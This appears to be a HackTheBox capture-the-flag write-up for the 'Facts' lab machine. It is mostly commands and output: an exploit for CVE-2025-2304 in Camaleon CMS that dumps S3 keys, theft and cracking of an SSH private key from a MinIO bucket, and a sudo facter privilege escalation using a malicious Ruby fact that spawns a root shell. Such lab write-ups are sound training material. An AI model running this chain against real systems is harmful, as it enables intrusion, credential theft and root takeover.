Facts

HackTheBox – Facts Write-up

Target

facts.htb
10.10.10.10

1. Reconnaissance

The first step was to perform a full service enumeration using Nmap.

nmap -p22,80,54321 -T4 -Pn -A 10.10.10.10

Explanation

• p22,80,54321 → scan specific ports
• T4 → faster scan timing
• Pn → skip host discovery
• A → OS detection, version detection, scripts, traceroute

Nmap Result

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
54321/tcp open  http    Golang net/http server

Important observations

Port 22

OpenSSH 9.9p1 Ubuntu

SSH access is available.

Port 80

nginx 1.26.3
Title: facts

A web application is hosted on port 80.

Port 54321

Server: MinIO

The response contained XML errors from MinIO, which is an S3-compatible object storage server.

Example response:

<Error>
<Code>InvalidRequest</Code>
<Message>Invalid Request (invalid argument)</Message>
</Error>

This suggests that the service on port 54321 is a MinIO object storage server.

2. Web Enumeration

Navigating to:

http://facts.htb

We discovered the website and began exploring its functionality.

Eventually, an admin endpoint was discovered which allowed user registration.

After creating an account and logging in, we analyzed the application.

3. CMS Identification

Inside the admin panel we discovered that the application was running:

Camaleon CMS 2.9.0

This version is vulnerable to the following vulnerability:

CVE-2025-2304

Exploit reference:

https://github.com/Alien0ne/CVE-2025-2304

This vulnerability allows authenticated privilege escalation.

4. Exploiting Camaleon CMS

We downloaded the exploit and executed it.

Command used:

python3 exploit.py -u http://facts.htb/ -U abc -P abc

Exploit Output

[+] Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)

[+] Login confirmed
User ID: 6
Current User Role: client

[+] Loading privilege escalation

User ID: 6
Updated User Role: admin

[+] Extracting S3 Credentials

s3 access key: AKIA359692191D12012C
s3 secret key: Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB
s3 endpoint: http://localhost:54321

[+] Reverting User Role

Important discovery

The exploit revealed S3 credentials:

Access Key : AKIA359692191D12012C
Secret Key : Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB
Endpoint   : http://localhost:54321

Since the endpoint is MinIO, we can connect to it.

5. Connecting to MinIO

To interact with MinIO we used the MinIO client (mc).

Installing mc

wget https://dl.min.io/client/mc/release/linux-amd64/mc
chmod +x mc
sudo mv mc /usr/local/bin/

Configure MinIO connection

mc alias set facts http://facts.htb:54321 \
AKIA359692191D12012C \
Om1lADPdbrmzREEiDd5PNCj2cxjYBItKVAhuGHpB

Successful connection message:

Added 'facts' successfully

6. Enumerating Buckets

Now we list available buckets.

mc ls facts

Output:

internal
randomfacts

These are S3 buckets.

7. Downloading Buckets

We mirrored the buckets locally.

mc mirror facts/internal .
mc mirror facts/randomfacts .

Inside the internal bucket we found:

internal/.ssh

Listing files:

ls

Output:

authorized_keys
id_ed25519

8. Inspecting SSH Keys

Viewing the private key:

cat id_ed25519

Output:

-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

This key was password protected.

9. Cracking the SSH Key

First we converted the key to a format compatible with John the Ripper.

ssh2john id_ed25519 > hash.txt

Then we cracked it using rockyou.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Output:

dragonballz      (id_ed25519)

The passphrase is:

dragonballz

10. Finding the Username

We still needed the username.

We used the following command:

ssh-keygen -y -f id_ed25519

Output:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHjKR303Vqlu4EvRQ1VbcaRrxyFbkiuAr8si3qgLU3Sh trivia@facts.htb

Important observation:

trivia@facts.htb

This suggests the username is:

trivia

11. SSH Access

We connected using the private key.

ssh -i id_ed25519 trivia@facts.htb

Enter passphrase:

dragonballz

Successful login:

Welcome to Ubuntu 25.04

Checking user:

whoami

Output:

trivia

12. User Flag

Navigating to William's directory:

cd /home/william
ls

Output:

user.txt

13. Privilege Escalation

After obtaining a shell as trivia, privilege escalation was possible via facter.

The binary /usr/bin/facter could be executed with sudo and allowed loading custom Ruby facts.

This allows arbitrary command execution as root.

Step-by-Step Privilege Escalation

1. Create a custom facts directory

mkdir /tmp/facts

2. Create a malicious Ruby fact

nano /tmp/facts/root.rb

Insert the following code:

Facter.add(:pwned) do
  setcode do
    exec('/bin/bash')
  end
end

Save and exit.

3. Run facter with custom directory

sudo /usr/bin/facter--custom-dir /tmp/facts pwned

Expected result:

root@facts:/tmp#

14. Root Shell

Terminal output:

trivia@facts:/tmp$ mkdir /tmp/facts
trivia@facts:/tmp$ nano /tmp/facts/root.rb
trivia@facts:/tmp$ sudo /usr/bin/facter --custom-dir /tmp/facts pwned
root@facts:/tmp# whoami
root

Verify root privileges:

id

Output:

uid=0(root) gid=0(root)

15. Root Flag

Navigate to root directory:

cd /root
ls-la

Output:

-rw-r----- 1 root root 33 Mar 11 07:18 root.txt

Retrieve flag:

cat root.txt

Attack Chain Summary

Nmap Scan
     ↓
Web Enumeration
     ↓
Camaleon CMS 2.9.0
     ↓
CVE-2025-2304 Exploit
     ↓
Extract S3 Credentials
     ↓
Access MinIO
     ↓
Download internal bucket
     ↓
Retrieve SSH private key
     ↓
Crack key passphrase
     ↓
SSH as trivia
     ↓
Capture user flag
     ↓
Facter custom Ruby fact exploit
     ↓
Root shell
     ↓
Capture root flag

Key Security Issues

Vulnerable CMS

Camaleon CMS 2.9.0 allowed authenticated users to escalate privileges.

Secret Exposure

The application stored S3 credentials, allowing access to MinIO.

Sensitive Data in Storage

The object storage bucket contained SSH private keys.

Weak Key Passphrase

The SSH key was protected by a weak password (dragonballz).

Misconfigured sudo

facter allowed loading custom Ruby code, enabling root command execution.